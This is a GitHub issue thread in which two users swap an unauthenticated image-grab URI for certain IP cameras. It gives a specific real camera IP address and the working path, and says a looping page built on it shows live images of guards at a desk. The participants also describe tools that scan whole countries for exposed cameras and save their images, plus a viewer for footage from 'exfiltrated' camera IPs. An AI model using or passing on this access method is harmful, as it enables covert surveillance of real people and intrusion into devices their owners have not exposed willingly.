fyi: auth-bypass for image / pseudo moving image

[mcbazza]

Hey there. Found you via Shodan+OSINT ;-)

Just an fyi: Once you come up against these cams there's a URI that gives a static image via non-auth, as long as the cam is exposed via HTTP (any port) e.g. https://www.shodan.io/host/82.64.91.107 Shodan has the static image on 80/tcp and 554/tcp (same image). We can obviously get full moving image+audio via 554/tcp (RTSP). But, what about when 554/tcp isn't available?

If we were to go to: hxxp://82.64.91.107/jpgmulreq/1/image.jpg?key=&lq=12 (URI defanged to prevent auto-linking, change to http for it to work) We get a single static image. Press F5 to refresh. Or, craft a little local .html that pulls that image in, and some .js to refresh it every 500ms.

For an example of that, see: https://pastebin.com/raw/Qsej1DbP (change the IP+port accordingly. Or view as-is to see guards at a desk in RU ;-) )

Feel free to find+add me on Twitter/X, if you have an account there.

[BoomSec]

Hey boss! that is a great idea! I am now in the trial and error process of putting together a "viewer" of sorts that allows users to view the live footage from the camera's they have exfiltrated the IP's of.

On the interim I have added a couple lines of code that uses that jpgmulreq syntax to pull an image after the success code and stores it to a png called ip port_image.png

I was going to shoot a msg over to you on twt but you have dms closed. We should discuss optimising and improving this further. :D

[BoomSec]

Pushed an update to include the image grabber in some aspect. I need to improve my "changelog" skills but it will be right for now

[mcbazza]

No problem. If you @ me on there, I'll follow you, then you/we can DM.

btw: I have a cam scanner that's specific to 554/tcp😉. It's in my repo in 'main'. It'll find the cams with 554/tcp exposed, and if the cam is a cheap shjtty IP cam that's exposed via UPnP, it'll try to scan the web i/f and display some useful info that may be found there.

There's another version in the 'capture-images' branch that spawns a .py to then capture a still and save it.

And there's a version that's not yet public that uses masscan to let you scan an entire country, and capture images from all 554/tcp's that it finds.

Anyway. Enough of me spamming your repo. Feel free to close this. And I'll catch you via other means another time.

oh. btw: checkout 'rtspbrute' 😉

B

Sent from Outlookhttp://aka.ms/weboutlook

---

From: Boom @.> Sent: 22 December 2023 11:32 To: BoomSec/Megapixel-IP-Camera-POC @.> Cc: Bazza @.>; Author @.> Subject: Re: [BoomSec/Megapixel-IP-Camera-POC] fyi: auth-bypass for image / pseudo moving image (Issue #1)

Hey boss! that is a great idea! I am now in the trial and error process of putting together a "viewer" of sorts that allows users to view the live footage from the camera's they have exfiltrated the IP's of.

On the interim I have added a couple lines of code that uses that jpgmulreq syntax to pull an image after the success code and stores it to a png called ip port_image.png

I was going to shoot a msg over to you on twt but you have dms closed. We should discuss optimising and improving this further. :D

— Reply to this email directly, view it on GitHubhttps://github.com/BoomSec/Megapixel-IP-Camera-POC/issues/1#issuecomment-1867579604, or unsubscribehttps://github.com/notifications/unsubscribe-auth/AJTCVBMIOJ65TRUFHLEYRWTYKVVWJAVCNFSM6AAAAABA5CSERKVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNRXGU3TSNRQGQ. You are receiving this because you authored the thread.

[BoomSec]

Yooo I finally pushed out the interface. Tried to host it using github . io but pulling images from http on a https hosted site does not go well so I just put the code to the interface on the main branch.